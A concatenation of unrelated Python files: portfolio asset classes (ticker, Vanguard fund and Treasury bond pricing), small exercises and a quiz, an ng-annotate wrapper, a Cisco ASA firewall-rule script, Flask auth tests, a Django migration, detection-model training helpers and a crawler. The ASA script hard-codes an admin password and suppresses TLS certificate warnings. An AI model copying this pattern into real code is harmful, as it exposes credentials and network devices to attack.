
    def from_dict(self, d):
        """Reverse of to_dict: apply any 'What if' delta found in d.

        Args:
            d: A dictionary representing self.

        Returns: self, after consuming the 'What if' key (if present).
        """
        self.what_if(d.pop('What if', 0))
        return self

    def to_table(self):
        """Return a lakshmi.table.Table suitable for pretty-printing.

        Returns: lakshmi.table.Table object representing the data in this
            class.
        """
        table = Table(2).add_row(['Name:', f'{self.name()}'])

        asset_mapping_table = Table(2, coltypes=['str', 'percentage'])
        for asset_class, ratio in self.class2ratio.items():
            asset_mapping_table.add_row([f'{asset_class}', ratio])
        table.add_row(['Asset Class Mapping:',
                       f'{asset_mapping_table.string(tablefmt="plain")}'])

        if not self._delta:
            table.add_row(
                ['Value:', f'{utils.format_money(self.adjusted_value())}'])
        else:
            # Show both the adjusted value and the delta it includes.
            table.add_row(['Adjusted Value:',
                           f'{utils.format_money(self.adjusted_value())}'])
            table.add_row(
                ['What if:', f'{utils.format_money_delta(self._delta)}'])
        return table

    def string(self):
        """Return a plain-text rendering of this object."""
        return self.to_table().string(tablefmt='plain')

    def what_if(self, delta):
        """Add delta (what if) to the adjusted value of this asset.

        Deltas accumulate across calls (what_if(100) twice adds 200);
        a previous adjustment is undone by calling what_if(-delta).
        The number of shares, etc. are not changed.

        Args:
            delta: A float to be added to the total value.
        """
        self._delta += delta
        # Snap tiny residuals (floating point noise) back to exactly zero.
        if abs(self._delta) < 1e-6:
            self._delta = 0

    def get_what_if(self):
        """Return the accumulated what-if delta applied to the value."""
        return self._delta

    def adjusted_value(self):
        """Return value() plus any what-if delta, floored at zero."""
        return max(0, self.value() + self.get_what_if())

    @abstractmethod
    def value(self):
        """Returns the value of this asset."""

    @abstractmethod
    def name(self):
        """Returns the full name of this asset."""

    @abstractmethod
    def short_name(self):
        """Returns the short name of this asset (ideally < 10 chars)."""
class ManualAsset(Asset):
    """Catch-all asset whose value is entered by hand.

    The value is never refreshed automatically; it stays whatever the
    user last specified.
    """

    def __init__(self, name, value, class2ratio):
        """
        Args:
            name: Full name of this asset (doubles as the short name).
            value: Current value of this asset in dollars (float).
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0

        Raises: AssertionError if value is negative.
        """
        assert value >= 0, 'Value of an asset can not be negative.'
        self._name = name
        self._value = value
        super().__init__(class2ratio)

    def to_dict(self):
        """Serialize this asset into a dictionary."""
        return {'Name': self._name,
                'Value': self._value,
                'Asset Mapping': self.class2ratio,
                **super().to_dict()}

    @classmethod
    def from_dict(cls, d):
        """Build a new ManualAsset from dictionary d (reverse of to_dict).

        Args:
            d: A dictionary (usually the output of to_dict).

        Returns: A new ManualAsset object.

        Raises: AssertionError if d cannot be parsed correctly.
        """
        new_asset = ManualAsset(d.pop('Name'),
                                d.pop('Value', 0),
                                d.pop('Asset Mapping'))
        Asset.from_dict(new_asset, d)
        assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
        return new_asset

    def value(self):
        """Return the manually-specified value of this asset."""
        return self._value

    def name(self):
        """Return the full name of this asset."""
        return self._name

    def short_name(self):
        """Return the short name (identical to the full name)."""
        return self._name
class TaxLot:
    """A single purchase (tax) lot of a traded asset."""

    def __init__(self, date, quantity, unit_cost):
        """
        Args:
            date: Purchase date, as a 'YYYY/MM/DD' string.
            quantity: Number of shares bought on that date.
            unit_cost: Price paid per share.

        Raises: AssertionError if date is not in the right format.
        """
        # Validate the date format up front.
        assert re.match(r'\d{4}/\d{2}/\d{2}', date), (
            'Tax lot dates should be in format YYYY/MM/DD')
        self.date = date
        self.quantity = quantity
        self.unit_cost = unit_cost

    def to_dict(self):
        """Serialize this lot into a dictionary."""
        return {'Date': self.date,
                'Quantity': self.quantity,
                'Unit Cost': self.unit_cost}

    @classmethod
    def from_dict(cls, d):
        """Build a new TaxLot from a dictionary (reverse of to_dict).

        Args:
            d: A dictionary representing a TaxLot (usually to_dict output).

        Returns: The reconstructed TaxLot object.

        Raises: AssertionError if d can't be parsed properly.
        """
        lot = TaxLot(d.pop('Date'), d.pop('Quantity'), d.pop('Unit Cost'))
        assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
        return lot
class TradedAsset(Asset):
    """Abstract class representing an asset that is traded on stock market.

    This asset is assumed to have 'shares' and per unit price and can
    optionally have tax lots."""

    def __init__(self, shares, class2ratio):
        """
        Args:
            shares: Number of shares of this asset.
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
        """
        self._shares = shares
        self._tax_lots = None  # Optional list of TaxLot; None until set_lots().
        super().__init__(class2ratio)

    def to_dict(self):
        """Converts this asset into a dictionary.

        Only emits 'Tax Lots' when lots have been set; also merges in the
        'What if' delta (if any) from the base Asset class.
        """
        d = dict()
        if self._tax_lots:
            d.update({'Tax Lots': [lot.to_dict() for lot in self._tax_lots]})
        d.update(super().to_dict())
        return d

    def from_dict(self, d):
        """Initializes self with data provided via dictionary d.

        Consumes the optional 'Tax Lots' key (and, via the base class,
        'What if') from d.

        NOTE(review): returns None (not self) when 'Tax Lots' is absent;
        the class-method factories below ignore the return value, so this
        is harmless, but it is inconsistent — confirm before relying on
        the return value.
        """
        super().from_dict(d)
        if 'Tax Lots' not in d:
            return
        tax_lots_list = [TaxLot.from_dict(lot_dict)
                         for lot_dict in d.pop('Tax Lots')]
        self.set_lots(tax_lots_list)
        return self

    def shares(self):
        """Returns the number of shares."""
        return self._shares

    def get_lots(self):
        """Returns the tax lots or None if they are not set.

        Returns: A list of TaxLot or None if not set.
        """
        return self._tax_lots

    def set_lots(self, tax_lots_list):
        """Sets the tax lots.

        Args:
            tax_lots_list: A list of TaxLot representing all the tax_lots.

        Returns: self, for chaining.

        Raises: AssertionError if the number of shares in the lots don't
        sum up to the number of shares in this asset.
        """
        sum_lots = sum([t.quantity for t in tax_lots_list])
        # Tolerance absorbs floating-point share quantities.
        assert abs(sum_lots - self._shares) < 1e-6, (
            f'Lots provided should sum up to {self._shares}')
        self._tax_lots = tax_lots_list
        return self

    def list_lots(self):
        """Returns a table of tax lots.

        This function returns a Table of tax lots which can be used to
        pretty-print the tax lot information. Returns an empty (headers
        only) table when no lots are set.

        Returns: lakshmi.table.Table object containing Date, Quantity,
        Cost, Gain and Gain% fields for all the lots.
        """
        table = Table(5,
                      headers=['Date', 'Quantity', 'Cost', 'Gain', 'Gain%'],
                      coltypes=['str', 'float', 'dollars', 'delta_dollars',
                                'percentage'])
        if not self._tax_lots:
            return table

        for lot in self._tax_lots:
            table.add_row(
                [lot.date,
                 lot.quantity,
                 lot.unit_cost * lot.quantity,
                 # Unrealized gain in dollars, then as a fraction of cost.
                 (self.price() - lot.unit_cost) * lot.quantity,
                 self.price() / lot.unit_cost - 1])
        return table

    def to_table(self):
        """Returns this asset as a lakshmi.table.Table object."""
        table = super().to_table()
        table.add_row(['Price:', f'{utils.format_money(self.price())}'])
        return table

    def string(self):
        """Returns this asset as a string (with tax lots, if set)."""
        if not self._tax_lots:
            return super().string()

        return (super().string() + '\n\nTax lots:\n'
                + f'{self.list_lots().string()}')

    def value(self):
        """Returns the current market value (shares x price) of this asset."""
        return self.shares() * self.price()

    # This class inherits abstract methods name & short_name from Asset.

    @abstractmethod
    def price(self):
        """Returns the current per-share market price of this asset."""
        pass
class NotFoundError(Exception):
    """Raised when an asset's data cannot be fetched from its provider."""
    pass
class TickerAsset(TradedAsset, Cacheable):
    """An asset class represented by a Ticker whose price can be pulled."""

    def __init__(self, ticker, shares, class2ratio):
        """
        Args:
            ticker: Ticker of this asset (string),
            shares: Total number of shares.
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
        """
        self._ticker = ticker
        # Use a custom session so Yahoo Finance sees a descriptive
        # user-agent for this application.
        session = requests.Session()
        session.headers['user-agent'] = (
            f'{lakshmi.constants.NAME}/{lakshmi.constants.VERSION}')
        self.yticker = yfinance.Ticker(ticker, session=session)
        super().__init__(shares, class2ratio)

    def to_dict(self):
        """Returns a dict representing this object."""
        d = {'Ticker': self._ticker,
             'Shares': self.shares(),
             'Asset Mapping': self.class2ratio}
        d.update(super().to_dict())
        return d

    @classmethod
    def from_dict(cls, d):
        """Returns a new object specified by dictionary d.

        This is reverse of to_dict.

        Args:
            d: A dictionary (usually the output of to_dict).

        Returns: A new TickerAsset object.

        Raises: AssertionError if d cannot be parsed correctly.
        """
        ret_obj = TickerAsset(
            d.pop('Ticker'),
            d.pop('Shares'),
            d.pop('Asset Mapping'))
        TradedAsset.from_dict(ret_obj, d)
        assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
        return ret_obj

    def to_table(self):
        """Returns a table representing this object.

        This function converts this object into a table
        suitable for pretty-printing.

        Returns: lakshmi.table.Table object representing the data in this
        class.
        """
        table = super().to_table()
        rows = table.list()
        # Show the ticker as the very first row.
        rows.insert(0, ['Ticker:', f'{self._ticker}'])
        table.set_rows(rows)
        return table

    def cache_key(self):
        """Unique key used for caching return values."""
        return self._ticker

    @cache(365)  # Name changes are rare.
    def name(self):
        """Returns full name of this asset.

        This function pulls the name corresponding to the ticker symbol
        of this asset. The return value is cached for 365 days.

        Returns: A string representing the name of this asset.

        Raises: NotFoundError if the ticker is not found.
        """
        if self.yticker.info.get('longName') is None:
            raise NotFoundError(
                f'Cannot retrieve ticker ("{self._ticker}") '
                'from Yahoo Finance')
        return self.yticker.info['longName']

    def short_name(self):
        """Returns the short name (ticker) of this object."""
        return self._ticker

    @cache(1)
    def price(self):
        """Returns the per-share market price of this asset.

        The returned price is cached for a day.

        Returns: Price (float).

        Raises: NotFoundError if the ticker is not found.
        """
        if self.yticker.info.get('regularMarketPrice') is None:
            raise NotFoundError(
                f'Cannot retrieve ticker ("{self._ticker}") '
                'from Yahoo Finance')
        return self.yticker.info['regularMarketPrice']
class VanguardFund(TradedAsset, Cacheable):
    """An asset class representing Vanguard trust fund represented by a
    numeric ID."""

    def __init__(self, fund_id, shares, class2ratio):
        """
        Args:
            fund_id: Integer representing the Fund Id.
            shares: Number of shares of this fund.
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
        """
        self._fund_id = fund_id
        super().__init__(shares, class2ratio)

    def to_dict(self):
        """Returns a dict representing this object."""
        d = {'Fund Id': self._fund_id,
             'Shares': self.shares(),
             'Asset Mapping': self.class2ratio}
        d.update(super().to_dict())
        return d

    @classmethod
    def from_dict(cls, d):
        """Returns a new object specified by dictionary d.

        This is reverse of to_dict.

        Args:
            d: A dictionary (usually the output of to_dict).

        Returns: A new VanguardFund object.

        Raises: AssertionError if d cannot be parsed correctly.
        """
        ret_obj = VanguardFund(
            d.pop('Fund Id'),
            d.pop('Shares'),
            d.pop('Asset Mapping'))
        TradedAsset.from_dict(ret_obj, d)
        assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
        return ret_obj

    def to_table(self):
        """Returns this asset as a lakshmi.table.Table object."""
        table = super().to_table()
        rows = table.list()
        # Show the fund id as the very first row.
        rows.insert(0, ['Fund id:', f'{self._fund_id}'])
        table.set_rows(rows)
        return table

    def cache_key(self):
        """Unique key used for caching return values."""
        return str(self._fund_id)

    @cache(365)  # Name changes are very rare.
    def name(self):
        """Returns full name of this asset.

        This function returns the name of the fund corresponding to
        the fund id, via Vanguard's public API. The returned name is
        cached for 365 days.

        Returns: A string representing the name of this asset.

        Raises: requests.HTTPError if the name cannot be fetched.
        """
        req = requests.get(
            f'https://api.vanguard.com/rs/ire/01/pe/fund/{self._fund_id}'
            '/profile.json',
            headers={'Referer': 'https://vanguard.com/'})
        req.raise_for_status()  # Raise if error
        return req.json()['fundProfile']['longName']

    def short_name(self):
        """Returns the short name (fund id, string) of this object."""
        return str(self._fund_id)

    @cache(1)
    def price(self):
        """Returns the per-share market price of this asset.

        The returned price is cached for a day.

        Returns: Price (float).

        Raises: requests.HTTPError in case the price cannot be fetched.
        """
        req = requests.get(
            f'https://api.vanguard.com/rs/ire/01/pe/fund/{self._fund_id}'
            '/price.json',
            headers={'Referer': 'https://vanguard.com/'})
        req.raise_for_status()  # Raise if error
        return float(req.json()['currentPrice']
                     ['dailyPrice']['regular']['price'])
class _TreasuryBonds(Asset):
    """Class representing a collection of I or EE bonds."""

    class Bond(Cacheable):
        """A class representing individual I or EE Bond."""

        def __init__(self, series, issue_date, denom):
            """
            Args:
                series: Type of Bond, either 'I' or 'EE'.
                issue_date: String representing the issue month, in MM/YYYY
                format.
                denom: The denomination of this bond.
            """
            self.series = series
            self.issue_date = issue_date
            self.denom = denom
            # Value the bond as of the current month.
            self.redemption_date = datetime.datetime.now().strftime('%m/%Y')

        def cache_key(self):
            """Unique key used for caching return values."""
            return '{}_{}_{}'.format(
                self.series,
                self.issue_date.replace('/', '.'),
                self.redemption_date.replace('/', '.'))

        @cache(32)  # The value of a Bond doesn't change in a month.
        def _get_bond_info(self):
            """Returns the rate and value of a $1000 bond.

            NOTE(review): this scrapes the TreasuryDirect savings-bond
            calculator HTML; the hard-coded cell indices (6 and 7) depend
            on the page layout and will break if the site changes.

            Returns: A tuple representing the percentage rate and
            the current dollar value.
            """
            data = {
                'RedemptionDate': self.redemption_date,
                'Series': self.series,
                'Denomination': '1000',
                'IssueDate': self.issue_date,
                'btnAdd.x': 'CALCULATE'
            }

            req = requests.post(
                'http://www.treasurydirect.gov/BC/SBCPrice', data=data)
            req.raise_for_status()

            # Pull the table cells out of the returned HTML and strip tags.
            ret_vals = re.findall('\n<td>.*</td>', req.text)
            rate = re.sub('\n|<[^>]+>', '', ret_vals[6])
            value = float(re.sub('\n|\\$|,|<[^>]+>', '', ret_vals[7]))
            # EE Bonds returned are half the value (I guess TD website
            # assumes paper bonds)
            return rate, value * (2.0 if self.series == 'EE' else 1.0)

        def value(self):
            """Returns the current value of this bond."""
            unused_rate, value = self._get_bond_info()
            # Scale the $1000-denomination value to this bond's denomination.
            return value * (self.denom / 1000.0)

        def rate(self):
            """Returns the current percentage rate of this bond."""
            rate, unused_value = self._get_bond_info()
            return rate

        def as_list(self):
            """Returns this bond as a list.

            Returns: A list of Issue date, denomination, rate (as percentage)
            and current value.
            """
            rate, value = self._get_bond_info()
            value *= (self.denom / 1000.0)
            return [self.issue_date, self.denom, rate, value]

    def __init__(self, series, class2ratio):
        """
        Args:
            series: The type of the bonds, either 'I' or 'EE'.
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
        """
        self._series = series
        super().__init__(class2ratio)
        self._bonds = []

    def to_dict(self):
        """Returns a dict representing this object."""
        d = {}
        d['Bonds'] = []
        for bond in self._bonds:
            d['Bonds'].append(
                {'Issue Date': bond.issue_date, 'Denomination': bond.denom})
        d.update(super().to_dict())
        return d

    def from_dict(self, d):
        """Initializes self with the bonds listed in dictionary d.

        This is reverse of to_dict.

        Args:
            d: A dictionary (usually the output of to_dict).

        Returns: self, with all the bonds from d added.

        Raises: AssertionError if d cannot be parsed correctly.
        """
        for bond in d.pop('Bonds'):
            self.add_bond(bond.pop('Issue Date'), bond.pop('Denomination'))
            assert len(bond) == 0, ('Extra attributes found: '
                                    f'{list(bond.keys())}')
        Asset.from_dict(self, d)
        return self

    def bonds(self):
        """Returns all bonds as list.

        Returns: A list of self.Bond objects.
        """
        return self._bonds

    def add_bond(self, issue_date, denom):
        """Adds a new bond to this asset.

        Args:
            issue_date: String representing the issue date (in MM/YYYY format)
            denom: The denomination of this bond.

        Returns: self, for chaining.
        """
        self._bonds.append(self.Bond(self._series, issue_date, denom))
        return self

    def value(self):
        """Returns the current market value of all the bonds."""
        value = 0.0
        for bond in self._bonds:
            value += bond.value()
        return value

    def list_bonds(self):
        """Returns all bonds as a table.

        Returns: A lakshmi.table.Table contains all the bonds in this asset.
        The columns correspond to Issue Date, Denomination, Rate as
        percentage, and current market value.
        """
        table = Table(
            4,
            headers=['Issue Date', 'Denom', 'Rate', 'Value'],
            coltypes=['str', 'dollars', 'str', 'dollars'])
        for bond in self._bonds:
            table.add_row(bond.as_list())
        return table

    def string(self):
        """Returns this asset as string."""
        return (super().string() + '\n\nBonds:\n'
                + f'{self.list_bonds().string()}')

    def name(self):
        """Returns the name of this asset (either 'I Bonds' or 'EE Bonds')."""
        return f'{self._series} Bonds'

    def short_name(self):
        """Returns short name (same as name)."""
        return self.name()
class IBonds(_TreasuryBonds):
    """A collection of US Treasury I Bonds."""

    def __init__(self, class2ratio):
        """
        Args:
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
        """
        super().__init__('I', class2ratio)

    def to_dict(self):
        """Serialize this object into a dictionary."""
        return {'Asset Mapping': self.class2ratio, **super().to_dict()}

    @classmethod
    def from_dict(cls, d):
        """Build a new IBonds object from dictionary d."""
        new_asset = IBonds(d.pop('Asset Mapping'))
        _TreasuryBonds.from_dict(new_asset, d)
        assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
        return new_asset
class EEBonds(_TreasuryBonds):
    """A collection of US Treasury EE Bonds."""

    def __init__(self, class2ratio):
        """
        Args:
            class2ratio: Dict of class_name -> ratio, where 0 < ratio <= 1.0
        """
        super().__init__('EE', class2ratio)

    def to_dict(self):
        """Serialize this object into a dictionary."""
        return {'Asset Mapping': self.class2ratio, **super().to_dict()}

    @classmethod
    def from_dict(cls, d):
        """Build a new EEBonds object from dictionary d."""
        new_asset = EEBonds(d.pop('Asset Mapping'))
        _TreasuryBonds.from_dict(new_asset, d)
        assert len(d) == 0, f'Extra attributes found: {list(d.keys())}'
        return new_asset
# A list of all the asset types (classes) defined in this module. Used by
# from_dict() to map a serialized class name back to its class.
CLASSES = [ManualAsset, TickerAsset, VanguardFund, IBonds, EEBonds]
|
# Read two integers from one line of standard input.
x, y = map(int, input().split())


def calc(x, y):
    """Return the sum, difference, product and quotient of x and y."""
    return (x + y, x - y, x * y, x / y)


# Unpack the four results and print them with Korean labels.
plus, minus, times, divide = calc(x, y)
print('덧셈: {0}, 뺄셈: {1}, 곱셈: {2}, 나눗셈: {3}'.format(plus, minus, times, divide))
# 1. Consider the following Python function.
def mystery(l):
    """Return a reversed copy of l, built recursively.

    Each call reverses the tail of the list and appends the head,
    so the whole list comes back in reverse order.
    """
    if not l:
        return l
    head, tail = l[:1], l[1:]
    return mystery(tail) + head
# What does mystery([22,34,18,57,92,45]) return?
# Ans: [45, 92, 57, 18, 34, 22]  (mystery reverses the list recursively)

# 2. What is the value of pairs after the following assignment?
pairs = [ (x,y) for x in range(5,1,-1) for y in range(4,1,-1) if (x+y)%3 == 0 ]
# Ans: [(5, 4), (4, 2), (3, 3), (2, 4)]

# 3. Consider the following dictionary.
wickets = {"Tests":{"Ishant":[3,5,2,3],"Shami":[4,4,1,0],"Bumrah":[2,1,7,4]},"ODI":{"Ishant":[2,0],"Shami":[1,2]}}
# Which of the following statements does not generate an error?
# Options:-
# wickets["ODI"]["Bumrah"][0:] = [4,4]
# wickets["ODI"]["Bumrah"].extend([4,4])
# wickets["ODI"]["Bumrah"] = [4,4]
# wickets["ODI"]["Bumrah"] = wickets["ODI"]["Bumrah"] + [4,4]
# Ans: wickets["ODI"]["Bumrah"] = [4,4]
#      (wickets["ODI"] has no "Bumrah" key, so only plain assignment works;
#      the other options raise KeyError by reading the missing key first)

# 4. Assume that hundreds has been initialized as an empty dictionary:
hundreds = {}
# Which of the following generates an error?
# Options:-
# hundreds["Tendulkar, international"] = 100
# hundreds["Tendulkar"] = {"international":100}
# hundreds[("Tendulkar","international")] = 100
# hundreds[["Tendulkar","international"]] = 100
# Ans: hundreds[["Tendulkar","international"]] = 100
#      (lists are unhashable and therefore cannot be used as dict keys)
from execjs import get
import sys
import os.path as op  # NOTE(review): 'op' appears unused in this module.

# node_modules points at the directory containing the 'ng-annotate'
# package; prefer the package-relative import, fall back to a flat one
# when this file is run as a script.
try:
    from .rel import node_modules
except ImportError:
    from rel import node_modules

# Compile a small JS shim inside Node: seePath() exposes the module
# search path for debugging, annotate() wraps the ng-annotate package.
rt = get('Node')
context = rt.compile('''
module.paths.push('%s');
function seePath(){
    return module.paths;
}
var ng = require('ng-annotate');
function annotate(src,cfg){
    return ng(src,cfg);
}''' % node_modules)
def ng_annotate(src, cfg=None):
    """Run ng-annotate over *src* and return the annotated source.

    Args:
        src: AngularJS source code as a string.
        cfg: Optional ng-annotate options dict; any falsy value falls
            back to {'add': True}.

    Returns: The annotated source string, or None if ng-annotate
        produced no 'src' key.
    """
    options = cfg or dict(add=True)
    result = context.call('annotate', src, options)
    return result.get('src', None)
# Sample AngularJS snippet used for manually exercising ng_annotate.
# NOTE(review): despite the name, this is plain JavaScript, not CoffeeScript.
coffee = '''
var app = angular.module('my.app',[]);
app.controller('TestCtrl',function($scope){
});
'''
def test():
    """Print the Node module search paths (debug helper)."""
    # BUG FIX: the original used a Python 2 'print' statement, which is a
    # SyntaxError on Python 3; print(x) with one argument behaves the
    # same on both Python 2 and 3.
    print(context.call('seePath'))


def main():
    """Annotate the file named by the last CLI argument and print it."""
    print(ng_annotate(open(sys.argv[-1], 'r').read(), ''))


if __name__ == "__main__":
    main()
    #test()
|
import json
from urllib3 import *
from base64 import b64encode
def create_acl(VLANID):
    """Create an inbound ICMP permit rule for the given VLAN's host network
    object on a Cisco ASA via its REST API (basic-auth POST).

    NOTE(review): credentials and the ASA address are hard-coded below.
    """
    username = "admin"
    password = "Cisc0123"
    ip = "192.168.1.104"
    # The ASA uses a self-signed certificate; silence urllib3's TLS warnings.
    disable_warnings()
    http = PoolManager()
    print('配置ACL')
    object_name = "VLAN_" + str(VLANID) + "_HOST"
    # Build the Basic authentication header.
    credentials = b64encode((username + ':' + password).encode()).decode("ascii")
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Basic %s' % credentials,
    }
    # Rule payload: permit ICMP from anywhere to the VLAN host object.
    json_data = {
        "sourceAddress": {
            "kind": "AnyIPAddress",
            "value": "any"
        },
        "destinationAddress": {
            "kind": "objectRef#NetworkObj",
            "objectId": object_name
        },
        "destinationService": {
            "kind": "NetworkProtocol",
            "value": "icmp"
        },
        "permit": True,
        "active": True
    }
    # Target URL: inbound access rules on the 'Outside' interface.
    url = 'https://' + ip + '/api/access/in/Outside/rules'
    response = http.request('POST', url, headers=headers, body=json.dumps(json_data))
    print(response.data.decode())

if __name__ == "__main__":
    create_acl(46)
from models.user import UserModel
from tests.base_test import BaseTest
import json # convert our data into json{"key":"value",pair} format
class UserTest(BaseTest):
    """End-to-end tests for user registration and JWT authentication."""

    def test_register_user(self):
        with self.app() as client, self.app_context():
            resp = client.post('/register', data={"username": "test", "password": '1234'})

            # A fresh registration returns 201, persists the user, and confirms it.
            self.assertEqual(resp.status_code, 201)
            self.assertIsNotNone(UserModel.find_by_username('test'))
            self.assertDictEqual({"Message":"User created successfully"}, json.loads(resp.data))

    def test_register_and_login(self):
        with self.app() as client, self.app_context():
            client.post('/register', data={"username": "test", "password": '1234'})
            auth_resp = client.post(
                '/auth',
                data=json.dumps({'username': 'test', 'password': '1234'}),
                headers={"Content-Type": "application/json"},
            )

            # A successful /auth response carries a JWT under "access_token".
            self.assertIn("access_token", json.loads(auth_resp.data).keys())

    def test_register_duplicate(self):
        with self.app() as client, self.app_context():
            client.post('/register', data={'username': "test", "password": "1234"})
            dup_resp = client.post('/register', data={"username": "test", "password": '1234'})

            # Registering the same username twice is rejected with 400.
            self.assertEqual(dup_resp.status_code, 400)
            self.assertDictEqual({"Message":"A user with that username already"}, json.loads(dup_resp.data))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-20 15:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: narrows `calls.trade` to a 4-char BUY/SELL choice field."""

    dependencies = [
        ('trading', '0007_auto_20160718_2253'),
    ]

    operations = [
        migrations.AlterField(
            model_name='calls',
            name='trade',
            field=models.CharField(choices=[('BUY', 'BUY'), ('SELL', 'SELL')], default='BUY', max_length=4),
        ),
    ]
|
#PF-Prac-27
def check_for_ten(num1, num2):
    """Return True when either argument is 10 or the two sum to 10."""
    return 10 in (num1, num2) or num1 + num2 == 10

print(check_for_ten(10, 9))
import argparse
import torchvision.transforms as T
import torchvision
import torch.distributed as dist
import torch
from pathlib import Path
import os
import numpy as np
from torch.utils.tensorboard import SummaryWriter
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
def cuda(x):
    """Move x to the GPU when CUDA is available; otherwise return it unchanged."""
    if torch.cuda.is_available():
        return x.cuda()
    return x
def get_model(num_classes):
    """Return a COCO-pretrained Faster R-CNN whose box head predicts `num_classes` classes.

    num_classes counts the background, e.g. person + background => 2.
    """
    model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=True)
    # Swap the pre-trained classification head for one sized to our label set.
    in_features = model.roi_heads.box_predictor.cls_score.in_features
    model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)
    return model
def setup(rank):
    """Join the NCCL process group (world size 4) and pin this process to GPU `rank`."""
    dist.init_process_group(backend="nccl", rank=rank, init_method='env://', world_size=4)
    # Fixed seed so every worker process starts from identical model weights.
    torch.manual_seed(42)
    torch.cuda.set_device(rank)
def get_transform(train):
    """Build the image transform pipeline; training adds a 50% horizontal flip."""
    ops = [T.RandomHorizontalFlip(0.5)] if train else []
    ops.append(T.ToTensor())
    return T.Compose(ops)
def initialize_tensorboard(log_dir, common_name):
    """
    Create (if needed) the per-run log directory and return a SummaryWriter on it.

    In distributed training, tensorboard doesn't work with multiple writers
    reference: https://stackoverflow.com/a/37411400/4569025
    """
    tb_log_path = Path(log_dir).joinpath(common_name)
    # exist_ok removes the check-then-create race of the old os.path.exists/os.mkdir
    # pair; parents=True also creates a missing log_dir instead of raising.
    tb_log_path.mkdir(parents=True, exist_ok=True)
    return SummaryWriter(log_dir=tb_log_path)
def update_train_loss(tb_writer, train_loss, epoch):
    """Record this epoch's training loss under the 'train loss' scalar tag."""
    tb_writer.add_scalar(tag='train loss', scalar_value=train_loss, global_step=epoch)
def update_prediction_image(tb_writer, box, image, score, epoch, i):
    """Log prediction i's bounding-box overlay image and its IoU score for `epoch`."""
    tb_writer.add_image_with_boxes(
        "Prediction {}".format(i),
        img_tensor=np.array(image),
        box_tensor=np.array(box),
        global_step=epoch,
        walltime=None,
        rescale=1,
        dataformats='CHW',  # assumes `image` is channel-first — TODO confirm with caller
    )
    tb_writer.add_scalar(tag='IoU score', scalar_value=score, global_step=epoch)
def parse():
    """Build and parse the training command-line arguments (reads sys.argv)."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--data', metavar='DIR', help='path to dataset')
    parser.add_argument('--n-epochs', type=int, default=100)
    parser.add_argument('--batch-size', type=int, default=1)
    parser.add_argument('--lr', type=float, default=0.0001)
    parser.add_argument('--momentum', default=0.9, type=float, metavar='M', help='momentum')
    parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float, metavar='W',
                        help='weight decay (default: 1e-4)')
    parser.add_argument('--log-dir', metavar='DIR', help='path to save tensorboard logs', required=True)
    parser.add_argument('--save-as', metavar='NAME', help='save model as', required=True)
    parser.add_argument('--load-saved', metavar='DIR', help='path to load the previous saved model')
    # args taken for NVIDIA-APEX
    parser.add_argument("--local_rank", default=0, type=int)
    parser.add_argument('--opt-level', type=str)
    # arg('--keep-batchnorm-fp32', type=str, default=None)
    # arg('--sync_bn', action='store_true', help='enabling apex sync BN.')
    # arg('--loss-scale', type=str, default=None)
    return parser.parse_args()
|
# _*_ coding: utf-8 _*_
"""
This module demonstrates how to manage the URL,
to distinguish which of them has been handled, or not been handled yet
"""
class LinkManager(object):
    """Tracks crawl-frontier URLs (`new_urls`) versus already-visited ones (`old_urls`)."""

    def __init__(self):
        self.new_urls = set()   # URLs waiting to be crawled
        self.old_urls = set()   # URLs already crawled

    def has_new_link(self):
        """Return True while at least one URL is still waiting."""
        return self.size_new_url() != 0

    def add_new_url(self, url):
        """Queue a single URL unless it is None or already known (queued or visited).

        :param url: single url
        :return:
        """
        if url is None:
            return
        if url in self.new_urls or url in self.old_urls:
            return
        self.new_urls.add(url)

    def add_new_urls(self, urls):
        """Queue every URL of a collection; a None or empty collection is ignored.

        :param urls: url set
        :return:
        """
        if urls is None or len(urls) == 0:
            return
        for candidate in urls:
            self.add_new_url(candidate)

    def get_new_url(self):
        """Pop an arbitrary pending URL, mark it as visited, and return it."""
        url = self.new_urls.pop()
        self.old_urls.add(url)
        return url

    def size_new_url(self):
        """Number of URLs still waiting to be crawled."""
        return len(self.new_urls)

    def size_old_url(self):
        """Number of URLs already crawled."""
        return len(self.old_urls)
|
# Implement a data structure supporting the following operations:
# Inc(Key) - Inserts a new key with value 1. Or increments an existing key by 1. Key is guaranteed to be a non-empty string.
# Dec(Key) - If Key's value is 1, remove it from the data structure. Otherwise decrements an existing key by 1. If the key does not exist, this function does nothing. Key is guaranteed to be a non-empty string.
# GetMaxKey() - Returns one of the keys with maximal value. If no element exists, return an empty string "".
# GetMinKey() - Returns one of the keys with minimal value. If no element exists, return an empty string "".
# Challenge: Perform all these in O(1) time complexity.
from collections import defaultdict


class Bucket(object):
    """Doubly-linked-list node grouping all keys whose current count equals `rank`."""

    def __init__(self, rank):
        self.rank = rank
        self.keySet = set()
        self.prev = None
        self.next = None


class AllOne(object):
    """All-O(1) counter: inc/dec string keys and query a max/min-count key in O(1).

    Buckets of equal-count keys form a doubly linked list ordered by count,
    between two rank-0 dummy sentinels (head = minimum side, tail = maximum).
    """

    def __init__(self):
        """Initialize your data structure here."""
        self._keyValMap = defaultdict(int)   # key -> current count
        self._valKeyMap = {}                 # count -> Bucket of keys with that count
        self._dummyHead = Bucket(0)
        self._dummyTail = Bucket(0)
        self._valKeyMap[0] = self._dummyHead
        self._dummyHead.next = self._dummyTail
        self._dummyTail.prev = self._dummyHead

    def inc(self, key):
        """Insert a new key with value 1, or increment an existing key by 1.

        :type key: str
        :rtype: void
        """
